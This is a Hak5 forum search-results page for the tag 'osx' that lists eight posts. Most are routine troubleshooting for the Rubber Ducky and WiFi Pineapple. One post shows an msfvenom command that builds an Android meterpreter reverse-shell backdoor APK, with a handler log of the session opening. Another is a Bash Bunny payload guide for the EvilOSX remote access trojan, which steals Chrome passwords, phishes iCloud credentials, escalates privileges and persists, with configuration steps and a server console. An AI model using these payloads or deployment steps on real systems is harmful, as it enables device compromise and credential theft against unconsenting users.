Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'osx'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 8 results

  1. meterpreter stuck on OSX metasploit

    I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  2. [PAYLOAD] untitled_EVILOSX

    Please check git for the latest README/code https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX untitled_EVILOSX + ______ _ _ ____ _____ __ __ + | ____| (_)| | / __ \ / ____|\ \ / / + | |__ __ __ _ | || | | || (___ \ V / + | __|\ \ / /| || || | | | \___ \ > < + | |____\ V / | || || |__| | ____) | / . \ + |______|\_/ |_||_| \____/ |_____/ /_/ \_\\ + untitled_ bash bunny edition / stekole ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. ** Features Client reconnects automatically/persistence ECM_ETHERNET and HID attack Emulate a simple terminal instance. Sockets are encrypted with CSR via OpenSSL. No dependencies (pure python). Retrieve Chrome passwords. Retrieve iCloud contacts. Attempt to get iCloud password via phishing. Show local iOS backups. Download and upload files. Retrieve find my iphone devices. Attempt to get root via local privilege escalation (<= 10.10.5). Auto installer Configuration Server To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server. git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX ./Server and type your listening port (1337) Client Before you deploy your bash bunny, update your configuration in the EvilOSX.py file At the bottom of the file you will see a server and port variable Set these to your server IP and listening port ######################### SERVER_HOST = "10.99.99.16" SERVER_PORT = 1337 ######################### Usage Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server [email protected]:~/git/EvilOSX# ./Server.py ______ _ _ ____ _____ __ __ | ____| (_)| | / __ \ / ____|\ \ / / | |__ __ __ _ | || | | || (___ \ V / | __|\ \ / /| || || | | | \___ \ > < | |____\ V / | || || |__| | ____) | / . \ |______|\_/ |_||_| \____/ |_____/ /_/ \_\ [?] Port to listen on: 1337 [I] Type "help" to get a list of available commands. > help help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. exit - Close the server and exit. > clients [I] 1 client(s) available: 0 = client_hostname > connect 0 [I] Connected to "client_hostname", ready to send commands. Some of the other features can be found in the help menu. I have not tried them all help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. get_info - Show basic information about the client. get_root - Attempt to get root via local privilege escalation. download <path> - Downloads the file to the local machine. upload <path> - Uploads the file to the remote machine. chrome_passwords - Retrieve Chrome passwords. icloud_contacts - Retrieve iCloud contacts. icloud_phish - Attempt to get iCloud password via phishing. itunes_backups - Show the user's local iOS backups. find_my_iphone - Retrieve find my iphone devices. screenshot - Takes a screenshot of the client. kill_client - Brutally kill the client (removes the server). exit - Exits the session. Any other command will be executed on the connected client. Removal of Tool The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory rm -rf ~/Library/Containers/.EvilOSX/ launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist Defence disable the command-space short key for spotlight or disable spotlight all together if not needed Todo Issues I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py Run ./BUILDER and enter the appropriate information: After, copy this to your switch payload Thanks @Marten4n6 [YOURMOM](Check my room)
  3. ° sign instead of >

    Hi guys, I'm new here and need a bit of help regarding special characters along with the de.properties language file. My Ducky code requires the > sign (greater than), however by using the -l de.properties parameter my Rubber Ducky always writes a degree sign ° instead of >. In the properties file there is the following entry which should be fine: ASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT // 62 > On Windows this is working well, and that's why I'm thinking the properties file is correct. However, I need to get this work on my Mac as well. Do you have any tips? Thanks, David
  4. Hi, My MacBook Pro cannot find my newly bought Nano in the wp6.sh script, can anyone pls tell me why? It just keeps searching (.........) and never shows that it finds the device. If i do the same on a Linux machine it works fine. I can easily log in to the web interface on http://172.16.42.1:1471 Subsequent sessions may be quickly connected using saved settings. [C]onnect using saved settings [G]uided setup (recommended) [M]anual setup [A]dvanced IP settings [Q]uit Step 1 of 3: Select Default Gateway Default gateway reported as 192.168.0.1 Use the above reported default gateway? [Y/n]? Y Step 2 of 3: Select Internet Interface Internet interface reported as en0 Use the above reported Internet interface? [Y/n]? Y Step 3 of 3: Select WiFi Pineapple Interface Please connect the WiFi Pineapple to this computer. ................................................... ...................................................
  5. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  6. I found a script for ducky, that looked pretty cool, and also a thing I wanted to try. So I changed the details, for what I needed. To test how if it worked right (just if the text was right) I encoded it to open TextEdit instead of Terminal, now I got my inject.bin and plugged in my ducky. It opens TextEdit and types it in, BUT... for some reason it changes all > to § and < to $ it also changes ' to ’. I'm guessing it's because of the keyboard language but I'm using Danish keyboard and also encode it with Danish?? Sorry if bad English, and thx for any help and info given!
  7. Can't access Nano

    I can't even seem to connect to my new Nano there is no response on http://172.16.42.1:1471 I plug it in - it boots - blue light blinks - then goes solid ... My read of Ifconfig shows Nano is connected to en5 - but seems en5 has no IP address ??? Ifconfig output is below - and screen show is attached ... I'm stuck !!! Any ideas ? Is there a way to Hard Reset ?? ------------------------------------- en5: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 options=4<VLAN_MTU> ether 00:c0:ca:8f:b6:11 inet6 fe80::2c0:caff:fe8f:b611%en5 prefixlen 64 scopeid 0xa nd6 options=1<PERFORMNUD> media: autoselect (100baseTX <full-duplex,flow-control>) status: active bridge100: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 options=3<RXCSUM,TXCSUM> ether 9a:e0:d9:79:10:64 inet 192.168.2.1 netmask 0xffffff00 broadcast 192.168.2.255 inet6 fe80::98e0:d9ff:fe79:1064%bridge100 prefixlen 64 scopeid 0xb Configuration: id 0:0:0:0:0:0 priority 0 hellotime 0 fwddelay 0 maxage 0 holdcnt 0 proto stp maxaddr 100 timeout 1200 root id 0:0:0:0:0:0 priority 0 ifcost 0 port 0 ipfilter disabled flags 0x2 member: en5 flags=3<LEARNING,DISCOVER> ifmaxaddr 0 port 10 priority 0 path cost 0 nd6 options=1<PERFORMNUD> media: autoselect status: active pineapple-setup-stuck.pdf
  8. ICS on macOS: There and back again Apple likes to hard code the subnet (192.168.2.1) that is used on its implementation of Internet Connection Sharing (ICS). I don't know why; best I can figure is that somehow allows them to more reliably prevent the client network to access any resources on the host network. This is something that can be prevented on other ICS setups with a firewall rule. Which brings me to another point. Apple likes to change firewalls. Apple likes to change everything. They recently switched to PF and a lot of the guides online are from before this change. So we've established something here. Apple changes things. And we can't stop them from changing things. So what do we do? Accounting for Change One thing has remained consistent in their various iterations of ICS. They use the subnet 192.186.2.0/24. This gives us 1 constant, and if we've learned our lesson, we also know that it may not stay constant. So let me backup. *ahem* We have zero constants. But we can plan for this one constant changing. Apple needs this base principle (a subnet) on which to build its ICS implementation. Think of a single stream in the woods that recursively branches out into thousands. In order to catalog the various species in the stream, it would not be wise to visit and collect samples from every stream. This would be inefficient. It would better serve you, your time and your study to head to the one stream whence all others came. The source. This subnet is the one stream and any changes Apple makes will use it. And even if it changes it, it's still only one change we have to account for. Knowing this, we can start to look at this problem from another perspective. We can stop visiting individual streams and concede that our network must in the 192.168.2.1/24 range. What does that mean for Pineapple users? It means you can't access the Pineapple on 172.16.42.1 anymore. Is this a bad thing? Meh. It's a thing. For sure. I'd posit it's even a good thing. If we leave our pineapples on the default network, we eliminate the guesswork needed for anyone hunting pineapple. Yes, those people exists. And the tools necessary to do so bank on the fact that you haven't changed your default settings. See here. Is there a simple solution? Just move the pineapple to a different network! How? Depending on the version of the Pineapple, you can use WiFi or Ethernet or Etherner-over-USB to make the initial connection to the Pineapple over SSH on 172.16.42.1. Once you're in: # This one could be anything you want. It's what you'll use to connect after the reboot uci set network.lan.ipaddr='192.168.2.10' # This is where the Pineapple will get it's Internet from. uci set network.lan.gateway='192.168.2.1' uci commit && reboot That's it. Once you've rebooted, you can access the web interface and SSH like you would at 172.16.42.1, but if you used my configuration settings from above, you can access it from 192.168.2.10. What if Apple changes the subnet? Then you only have two values to change. Be sure to actually turn on ICS from the Mac's System Preferences > Sharing Pane.
×